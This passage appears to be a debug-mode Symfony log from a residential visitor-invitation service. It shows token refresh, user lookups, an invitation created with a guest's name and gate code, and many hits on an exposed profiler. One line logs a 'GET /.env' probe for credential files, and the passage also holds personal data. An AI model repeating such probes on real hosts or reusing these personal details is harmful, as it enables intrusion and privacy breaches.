  1329. [2025-12-16 20:16:43] security.INFO: Guard authentication failed. {"exception":"[object] (Hona\\AdminBundle\\Exception\\NotValidTokenFoundException(code: 0): Expired Token at /var/repositories/hona/src/Hona/AdminBundle/Security/AdminUserProvider.php:79)","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1330. [2025-12-16 20:16:43] security.DEBUG: The "Hona\ApiBundle\Security\ApiAuthenticator" authenticator set the response. Any later authenticator will not be called {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1331. [2025-12-16 20:16:45] request.INFO: Matched route "oauth2_token". {"route":"oauth2_token","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\OauthController::tokenAction","domain":"auth.unda.co","_route":"oauth2_token"},"request_uri":"https://auth.unda.co/oauth2/token","method":"POST"} []
  1332. [2025-12-16 20:16:45] php.INFO: User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead {"exception":"[object] (ErrorException(code: 0): User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead at /var/repositories/hona/vendor/doctrine/doctrine-bundle/Registry.php:62)"} []
  1333. [2025-12-16 20:16:45] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM refresh_token t0 WHERE t0.token = ? LIMIT 1 ["b1bcefd377ca6727c2b0c66fba [...]"] []
  1334. [2025-12-16 20:16:45] doctrine.DEBUG: "START TRANSACTION" [] []
  1335. [2025-12-16 20:16:45] doctrine.DEBUG: INSERT INTO access_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"ea268be9b03224f64d066e1f1e [...]","3":"2025-12-16 20:46:45","4":"","5":458,"6":"[]"} []
  1336. [2025-12-16 20:16:45] doctrine.DEBUG: "COMMIT" [] []
  1337. [2025-12-16 20:16:45] doctrine.DEBUG: "START TRANSACTION" [] []
  1338. [2025-12-16 20:16:45] doctrine.DEBUG: INSERT INTO refresh_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"2ddd8825467a868ac0ba2a908d [...]","3":"2026-02-14 20:16:45","4":"","5":458,"6":"[]"} []
  1339. [2025-12-16 20:16:45] doctrine.DEBUG: "COMMIT" [] []
  1340. [2025-12-16 20:16:45] doctrine.DEBUG: "START TRANSACTION" [] []
  1341. [2025-12-16 20:16:45] doctrine.DEBUG: DELETE FROM refresh_token WHERE client_id = ? AND token = ? [0,"b1bcefd377ca6727c2b0c66fba [...]"] []
  1342. [2025-12-16 20:16:45] doctrine.DEBUG: "COMMIT" [] []
  1343. [2025-12-16 20:16:46] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=address%2Cnotification_setting%2Cresidential","method":"GET"} []
  1344. [2025-12-16 20:16:46] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  1345. [2025-12-16 20:16:46] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1346. [2025-12-16 20:16:46] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1347. [2025-12-16 20:16:46] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1348. [2025-12-16 20:16:46] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["ea268be9b03224f64d066e1f1e [...]"] []
  1349. [2025-12-16 20:16:46] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [458] []
  1350. [2025-12-16 20:16:46] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1351. [2025-12-16 20:16:46] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1352. [2025-12-16 20:16:46] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1353. [2025-12-16 20:16:46] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["a1459bf9-4d7b-4d4c-ae6f-8a [...]"] []
  1354. [2025-12-16 20:16:46] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [458,1] []
  1355. [2025-12-16 20:16:46] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
  1356. [2025-12-16 20:16:46] doctrine.DEBUG: SELECT r0_.id AS id_0, r0_.uuid AS uuid_1, r0_.status AS status_2, r0_.date_created AS date_created_3, r0_.date_modified AS date_modified_4, r0_.name AS name_5, r0_.id_rule AS id_rule_6, r0_.plate_rule AS plate_rule_7, r0_.cp AS cp_8, r0_.neighborhood AS neighborhood_9, r0_.country AS country_10, r0_.state AS state_11, r0_.city AS city_12, u1_.permission AS permission_13 FROM residential r0_ INNER JOIN user_has_residential u1_ ON ((u1_.residential_id = r0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [458,1] []
  1357. [2025-12-16 20:16:46] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["ac5559db-94bf-49bb-b4bf-9d [...]"] []
  1358. [2025-12-16 20:16:46] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [458,259] []
  1359. [2025-12-16 20:16:46] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  1360. [2025-12-16 20:16:47] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"20","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"ac5559db-94bf-49bb-b4bf-9d75cd7022a2","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/ac5559db-94bf-49bb-b4bf-9d75cd7022a2/invitation/20/0?order=desc","method":"GET"} []
  1361. [2025-12-16 20:16:47] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  1362. [2025-12-16 20:16:47] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1363. [2025-12-16 20:16:47] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1364. [2025-12-16 20:16:47] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1365. [2025-12-16 20:16:47] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["ea268be9b03224f64d066e1f1e [...]"] []
  1366. [2025-12-16 20:16:47] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [458] []
  1367. [2025-12-16 20:16:47] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1368. [2025-12-16 20:16:47] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1369. [2025-12-16 20:16:47] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1370. [2025-12-16 20:16:47] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["ac5559db-94bf-49bb-b4bf-9d [...]"] []
  1371. [2025-12-16 20:16:47] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [458,259,1] []
  1372. [2025-12-16 20:16:47] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["ac5559db-94bf-49bb-b4bf-9d [...]"] []
  1373. [2025-12-16 20:16:47] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
  1374. [2025-12-16 20:16:47] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 20 OFFSET 0 [259,1] []
  1375. [2025-12-16 20:16:47] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [259,1] []
  1376. [2025-12-16 20:16:47] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [458] []
  1377. [2025-12-16 20:16:47] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [459] []
  1378. [2025-12-16 20:16:47] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  1379. [2025-12-16 20:17:22] request.INFO: Matched route "invitation_create". {"route":"invitation_create","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\InvitationController::invitationCreateAction","domain":"api.unda.co","_route":"invitation_create"},"request_uri":"https://api.unda.co/invitation/create","method":"POST"} []
  1380. [2025-12-16 20:17:22] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  1381. [2025-12-16 20:17:22] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1382. [2025-12-16 20:17:22] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1383. [2025-12-16 20:17:22] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1384. [2025-12-16 20:17:22] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["ea268be9b03224f64d066e1f1e [...]"] []
  1385. [2025-12-16 20:17:22] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [458] []
  1386. [2025-12-16 20:17:22] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1387. [2025-12-16 20:17:22] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1388. [2025-12-16 20:17:22] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1389. [2025-12-16 20:17:22] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["ac5559db-94bf-49bb-b4bf-9d [...]"] []
  1390. [2025-12-16 20:17:22] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [458,259,1] []
  1391. [2025-12-16 20:17:22] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["a1459bf9-4d7b-4d4c-ae6f-8a [...]"] []
  1392. [2025-12-16 20:17:22] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["ac5559db-94bf-49bb-b4bf-9d [...]"] []
  1393. [2025-12-16 20:17:22] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?)) WHERE (a0_.id = ?) AND (a0_.status = ?) LIMIT 1 [458,259,1] []
  1394. [2025-12-16 20:17:22] doctrine.DEBUG: "START TRANSACTION" [] []
  1395. [2025-12-16 20:17:22] doctrine.DEBUG: INSERT INTO invitation (uuid, status, date_created, date_modified, name, last_name, code, image_code_path, type, subtype, date_invitation, date_start, date_end, event_id, address_id, user_id) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) {"1":"d6dfc6a6-e678-411a-ac07-4c [...]","2":1,"3":"2025-12-16 20:17:22","4":"2025-12-16 20:17:22","5":"Evelin Del Carmen","6":"Lara Amendola","7":"726513","8":"/invitation/bec8ddc166ea3d [...]","9":1,"10":null,"11":"2025-12-16 21:00:00","12":null,"13":null,"14":null,"15":259,"16":458} []
  1396. [2025-12-16 20:17:22] doctrine.DEBUG: "COMMIT" [] []
  1397. [2025-12-16 20:17:22] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [458] []
  1398. [2025-12-16 20:17:22] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.id = ? LIMIT 1 [259] []
  1399. [2025-12-16 20:17:22] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  1400. [2025-12-16 20:17:53] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"93e1f8","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/93e1f8?panel=cache","method":"GET"} []
  1401. [2025-12-16 20:17:53] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  1402. [2025-12-16 20:22:08] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  1403. [2025-12-16 20:23:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"ec2e58","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/ec2e58?panel=time","method":"GET"} []
  1404. [2025-12-16 20:23:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  1405. [2025-12-16 20:29:24] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2515c0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/2515c0?panel=config","method":"GET"} []
  1406. [2025-12-16 20:29:24] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  1407. [2025-12-16 20:35:10] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4c7627","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/4c7627?panel=cache","method":"GET"} []
  1408. [2025-12-16 20:35:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  1409. [2025-12-16 20:38:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1410. [2025-12-16 20:38:35] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
  1411. [2025-12-16 20:40:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"25a5c3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/25a5c3?panel=config","method":"GET"} []
  1412. [2025-12-16 20:40:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  1413. [2025-12-16 20:45:05] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"502c46","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/502c46/search/results?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
  1414. [2025-12-16 20:45:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
  1415. [2025-12-16 20:46:22] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0b9d80","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/0b9d80?panel=config","method":"GET"} []
  1416. [2025-12-16 20:46:22] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  1417. [2025-12-16 20:51:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"50512a","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/50512a?panel=security","method":"GET"} []
  1418. [2025-12-16 20:51:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  1419. [2025-12-16 20:52:24] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"465a2b","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/465a2b","method":"GET"} []
  1420. [2025-12-16 20:52:24] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  1421. [2025-12-16 20:57:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"50512a","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/50512a?panel=config","method":"GET"} []
  1422. [2025-12-16 20:57:23] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  1423. [2025-12-16 21:02:53] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2c77cb","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/2c77cb?panel=security","method":"GET"} []
  1424. [2025-12-16 21:02:53] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  1425. [2025-12-16 21:04:25] request.INFO: Matched route "_profiler_search". {"route":"_profiler_search","route_parameters":{"_controller":"web_profiler.controller.profiler:searchAction","_route":"_profiler_search"},"request_uri":"https://unda.co/_profiler/search?limit=10","method":"GET"} []
  1426. [2025-12-16 21:04:28] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"e21315","_route":"_profiler_search_results"},"request_uri":"https://unda.co/_profiler/e21315/search/results?limit=10","method":"GET"} []
  1427. [2025-12-16 21:04:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?limit=10","method":"GET"} []
